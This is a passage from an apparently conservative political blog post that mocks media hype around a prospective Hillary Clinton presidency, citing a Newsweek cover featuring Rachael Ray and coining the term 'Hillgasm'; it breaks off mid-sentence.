The sense of inevitability that we will have a President Hillary Clinton that has set in amongst the MSM is approaching near-hysteria. Heck, even cooking blogs (h/t) are taking note (h/t):

As Newsweek gets more and more excited about the impending Hillary Clinton coronation nomination, they decided to highlight various women who have made it to the upper echelon of their respective fields and make a by-proxy comparison to how Clinton might lead the country.

The most prominent woman on the cover is the ubiquitous Rachael Ray. Who are the other two? Does it really matter? Actual female leaders don't help magazine sales.

Time to coin a term for all of this, ain't it? Glenn Reynolds has called it "Hillary-hype." In the spirit of the "Gorbasm" (for all of the fluffy stories about Gorbachev back in the day), I offer up the "Hillgasm". It doesn't describe your run of the mill political puff piece penned by an ideological fellow traveler. No, it is when a potential Hillary presidency
